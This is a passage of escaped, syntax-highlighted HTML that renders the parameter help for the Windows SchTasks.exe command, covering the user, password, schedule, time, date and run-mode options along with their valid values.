    &lt;span class="na"&gt;/U   &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;context&lt;/span&gt; &lt;span class="kd"&gt;under&lt;/span&gt; &lt;span class="kd"&gt;which&lt;/span&gt; &lt;span class="kd"&gt;SchTasks&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;should&lt;/span&gt; &lt;span class="kd"&gt;execute&lt;/span&gt;.
    &lt;span class="na"&gt;/P   &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;    &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;given&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;context&lt;/span&gt;. &lt;span class="kd"&gt;Prompts&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;input&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="kd"&gt;omitted&lt;/span&gt;.
    &lt;span class="na"&gt;/RU  &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"run as"&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;context&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="kd"&gt;under&lt;/span&gt; &lt;span class="kd"&gt;which&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt;. &lt;span class="kd"&gt;For&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"NT AUTHORITY\SYSTEM"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="s2"&gt;"SYSTEM"&lt;/span&gt;. &lt;span class="kd"&gt;For&lt;/span&gt; &lt;span class="kd"&gt;v2&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"NT AUTHORITY\LOCALSERVICE"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"NT AUTHORITY\NETWORKSERVICE"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;common&lt;/span&gt; &lt;span class="kd"&gt;SIDs&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="kd"&gt;also&lt;/span&gt; &lt;span class="kd"&gt;available&lt;/span&gt;.
    &lt;span class="na"&gt;/RP  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;    &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"run as"&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;. &lt;span class="kd"&gt;To&lt;/span&gt; &lt;span class="nb"&gt;prompt&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;value&lt;/span&gt; &lt;span class="kd"&gt;must&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="s2"&gt;"*"&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;none&lt;/span&gt;. &lt;span class="kd"&gt;The&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;ignored&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt;. &lt;span class="kd"&gt;Must&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;used&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/XML&lt;/span&gt;.
    &lt;span class="na"&gt;/SC   &lt;/span&gt;&lt;span class="kd"&gt;schedule&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;frequency&lt;/span&gt;.
                       &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt;: &lt;span class="kd"&gt;MINUTE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;HOURLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;DAILY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;WEEKLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;MONTHLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONCE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    &lt;span class="na"&gt;/MO   &lt;/span&gt;&lt;span class="kd"&gt;modifier&lt;/span&gt;      &lt;span class="kd"&gt;Refines&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;allow&lt;/span&gt; &lt;span class="kd"&gt;finer&lt;/span&gt; &lt;span class="kd"&gt;control&lt;/span&gt; &lt;span class="kd"&gt;over&lt;/span&gt; &lt;span class="kd"&gt;recurrence&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="kd"&gt;listed&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"Modifiers"&lt;/span&gt; &lt;span class="kd"&gt;section&lt;/span&gt; &lt;span class="kd"&gt;below&lt;/span&gt;.
    &lt;span class="na"&gt;/D    &lt;/span&gt;&lt;span class="kd"&gt;days&lt;/span&gt;          &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;day&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;s&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;week&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt;: &lt;span class="kd"&gt;MON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;TUE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;WED&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;THU&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;FRI&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SAT&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SUN&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;MONTHLY&lt;/span&gt; &lt;span class="kd"&gt;schedules&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;–31 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;day&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;. &lt;span class="kd"&gt;Wildcard&lt;/span&gt; &lt;span class="s2"&gt;"*"&lt;/span&gt; &lt;span class="kd"&gt;specifies&lt;/span&gt; &lt;span class="kd"&gt;all&lt;/span&gt; &lt;span class="kd"&gt;days&lt;/span&gt;.
    &lt;span class="na"&gt;/M    &lt;/span&gt;&lt;span class="kd"&gt;months&lt;/span&gt;        &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;s&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;year&lt;/span&gt;. &lt;span class="kd"&gt;Defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="kd"&gt;day&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt;: &lt;span class="kd"&gt;JAN&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;FEB&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;MAR&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;APR&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;MAY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;JUN&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;JUL&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;AUG&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SEP&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;OCT&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;NOV&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;DEC&lt;/span&gt;. &lt;span class="kd"&gt;Wildcard&lt;/span&gt; &lt;span class="s2"&gt;"*"&lt;/span&gt; &lt;span class="kd"&gt;specifies&lt;/span&gt; &lt;span class="kd"&gt;all&lt;/span&gt; &lt;span class="kd"&gt;months&lt;/span&gt;.
    &lt;span class="na"&gt;/I    &lt;/span&gt;&lt;span class="kd"&gt;idletime&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;amount&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;idle&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;wait&lt;/span&gt; &lt;span class="kd"&gt;before&lt;/span&gt; &lt;span class="kd"&gt;running&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;range&lt;/span&gt;: &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;999&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;.
    &lt;span class="na"&gt;/TN   &lt;/span&gt;&lt;span class="kd"&gt;taskname&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;name&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;uniquely&lt;/span&gt; &lt;span class="kd"&gt;identifies&lt;/span&gt; &lt;span class="kd"&gt;this&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/TR   &lt;/span&gt;&lt;span class="kd"&gt;taskrun&lt;/span&gt;       &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="nb"&gt;path&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;file&lt;/span&gt; &lt;span class="kd"&gt;name&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;programme&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="nb"&gt;at&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt;. &lt;span class="kd"&gt;Example&lt;/span&gt;: &lt;span class="kd"&gt;C&lt;/span&gt;:\windows\system32\calc.exe
    &lt;span class="na"&gt;/ST   &lt;/span&gt;&lt;span class="kd"&gt;starttime&lt;/span&gt;     &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;HH&lt;/span&gt;&lt;span class="nl"&gt;:mm&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="m"&gt;24&lt;/span&gt;‑hour&lt;span class="o"&gt;),&lt;/span&gt; &lt;span class="kd"&gt;e&lt;/span&gt;.g. &lt;span class="m"&gt;14&lt;/span&gt;:30 &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;:30 &lt;span class="kd"&gt;PM&lt;/span&gt;. &lt;span class="kd"&gt;Defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;current&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt;. &lt;span class="kd"&gt;Required&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;ONCE&lt;/span&gt;.
    &lt;span class="na"&gt;/RI   &lt;/span&gt;&lt;span class="kd"&gt;interval&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;repetition&lt;/span&gt; &lt;span class="kd"&gt;interval&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt;: &lt;span class="kd"&gt;MINUTE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;HOURLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;range&lt;/span&gt;: &lt;span class="m"&gt;1&lt;/span&gt;–599940 &lt;span class="kd"&gt;minutes&lt;/span&gt;. &lt;span class="kd"&gt;If&lt;/span&gt; &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/DU &lt;/span&gt;&lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;default&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;.
    &lt;span class="na"&gt;/ET   &lt;/span&gt;&lt;span class="kd"&gt;endtime&lt;/span&gt;       &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;HH&lt;/span&gt;&lt;span class="nl"&gt;:mm&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;e&lt;/span&gt;.g. &lt;span class="m"&gt;14&lt;/span&gt;:50 &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;:50 &lt;span class="kd"&gt;PM&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    &lt;span class="na"&gt;/DU   &lt;/span&gt;&lt;span class="kd"&gt;duration&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;duration&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;HH&lt;/span&gt;&lt;span class="nl"&gt;:mm&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;. &lt;span class="kd"&gt;For&lt;/span&gt; &lt;span class="na"&gt;/V&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="na"&gt;/RI &lt;/span&gt;&lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;duration&lt;/span&gt; &lt;span class="kd"&gt;defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;hour&lt;/span&gt;.
    &lt;span class="na"&gt;/K                  &lt;/span&gt;&lt;span class="kd"&gt;Terminates&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="nb"&gt;at&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;duration&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;. &lt;span class="kd"&gt;Must&lt;/span&gt; &lt;span class="kd"&gt;specify&lt;/span&gt; &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/DU&lt;/span&gt;.
    &lt;span class="na"&gt;/SD   &lt;/span&gt;&lt;span class="kd"&gt;startdate&lt;/span&gt;     &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;which&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt;. &lt;span class="kd"&gt;Format&lt;/span&gt; &lt;span class="kd"&gt;yyyy&lt;/span&gt;&lt;span class="na"&gt;/mm/dd&lt;/span&gt;. &lt;span class="kd"&gt;Defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;current&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONCE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    &lt;span class="na"&gt;/ED   &lt;/span&gt;&lt;span class="kd"&gt;enddate&lt;/span&gt;       &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;last&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt;. &lt;span class="kd"&gt;Format&lt;/span&gt; &lt;span class="kd"&gt;yyyy&lt;/span&gt;&lt;span class="na"&gt;/mm/dd&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONCE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;.
    &lt;span class="na"&gt;/EC   &lt;/span&gt;&lt;span class="kd"&gt;ChannelName&lt;/span&gt;   &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;event&lt;/span&gt; &lt;span class="kd"&gt;channel&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;OnEvent&lt;/span&gt; &lt;span class="kd"&gt;triggers&lt;/span&gt;.
    &lt;span class="na"&gt;/IT                &lt;/span&gt;&lt;span class="kd"&gt;Allows&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;interactively&lt;/span&gt; &lt;span class="kd"&gt;only&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;currently&lt;/span&gt; &lt;span class="kd"&gt;logged&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt;. &lt;span class="kd"&gt;This&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;only&lt;/span&gt; &lt;span class="kd"&gt;when&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;logged&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt;.
